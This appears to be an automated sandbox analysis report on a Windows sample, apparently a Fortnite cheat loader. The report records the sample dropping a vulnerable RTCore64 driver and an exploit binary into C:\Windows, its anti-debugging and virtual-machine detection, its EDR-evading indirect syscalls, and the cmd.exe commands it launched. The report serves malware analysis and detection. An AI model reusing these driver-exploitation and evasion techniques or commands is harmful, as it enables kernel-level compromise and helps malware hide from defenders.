Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Vulnerability.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Iyto7FYCJO.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Iyto7FYCJO.exe

Static file information: File size 6070784 > 1048576

Source: Iyto7FYCJO.exe

Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c9a00

Source: Iyto7FYCJO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source:	Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Source: Iyto7FYCJO.exe	Static PE information: section name: _RDATA
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp0
Source: Iyto7FYCJO.exe	Static PE information: section name: .vmp1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Vulnerability.exe

Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\Vulnerability.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	File created: C:\Windows\driver.sys			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A50008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C88ED9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C8A6000D value: E9 BB CB EB FF	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Memory written: PID: 1308 base: 7FF8C891CBC0 value: E9 5A 34 14 00	Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A3036BA4 second address: 7FF7A3036BAD instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A300CFB8 second address: 7FF7A308E2DA instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 23360512h 0x00000008 call 00007F93C8DCC21Ch 0x0000000d inc ecx 0x0000000e push edi 0x0000000f jmp 00007F93C8E1CC87h 0x00000014 inc ecx 0x00000015 push ebx 0x00000016 pushfd 0x00000017 dec ecx 0x00000018 rcr ebx, cl 0x0000001a push eax 0x0000001b inc ecx 0x0000001c bt ebx, FFFFFFF4h 0x00000020 inc bp 0x00000022 bts ebx, ebp 0x00000025 inc ecx 0x00000026 push ebp 0x00000027 inc ecx 0x00000028 shr bl, cl 0x0000002a xchg al, ah 0x0000002c rcr ah, FFFFFF99h 0x0000002f inc ecx 0x00000030 push edx 0x00000031 inc bp 0x00000033 movsx ebx, cl 0x00000036 bswap eax 0x00000038 push ebx 0x00000039 inc esp 0x0000003a mov ebx, edi 0x0000003c push edx 0x0000003d inc sp 0x0000003f btr eax, esi 0x00000042 btc ax, FFE0h 0x00000047 inc cx 0x00000049 sar ebx, 6Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e inc ecx 0x0000004f xor bl, FFFFFFB7h 0x00000052 push ebp 0x00000053 inc eax 0x00000054 rol ch, 00000007h 0x00000057 push ecx 0x00000058 dec ebp 0x00000059 test edi, ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d bsf di, sp 0x00000061 inc ebp 0x00000062 cmp ch, ch 0x00000064 inc ecx 0x00000065 shr bl, cl 0x00000067 inc ecx 0x00000068 push eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B4D305 second address: 7FF7A2B4D335 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 00000043h 0x00000005 inc ecx 0x00000006 pop edx 0x00000007 inc cx 0x00000009 bt ebx, ecx 0x0000000c inc ecx 0x0000000d pop ebx 0x0000000e sal bl, cl 0x00000010 pop ebp 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 and esp, 7E967785h 0x0000001c dec esp 0x0000001d test edx, esp 0x0000001f inc ecx 0x00000020 pop ebp 0x00000021 inc cx 0x00000023 xor eax, 5C410F04h 0x00000029 dec eax 0x0000002a bt eax, 0Fh 0x0000002e cbw 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	RDTSC instruction interceptor: First address: 7FF7A2B613F1 second address: 7FF7A2B613FA instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edi 0x00000004 inc ax 0x00000006 movsx edx, bh 0x00000009 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFA0 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Special instruction interceptor: First address: 7FF7A300CFB8 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys			Jump to dropped file
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Dropped PE file which has not been started: C:\Windows\driver.sys			Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Vulnerability.exe

API coverage: 7.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\timeout.exe TID: 2300

Thread sleep count: 38 > 30

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738F3B60

Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@SH
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfonsjX

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

Handle closed: DEADC0DE

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process queried: DebugObjectHandle			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Vulnerability.exe

5_2_00007FF7738F4B58

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle,

5_2_00007FF7738F14C0

Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F1630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4D00 SetUnhandledExceptionFilter,	5_2_00007FF7738F4D00
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F43B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF7738F43B8
Source: C:\Windows\Vulnerability.exe	Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF7738F4B58

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe

NtProtectVirtualMemory: Indirect: 0x7FF7A2B8EF62

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"	Jump to behavior
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"	Jump to behavior
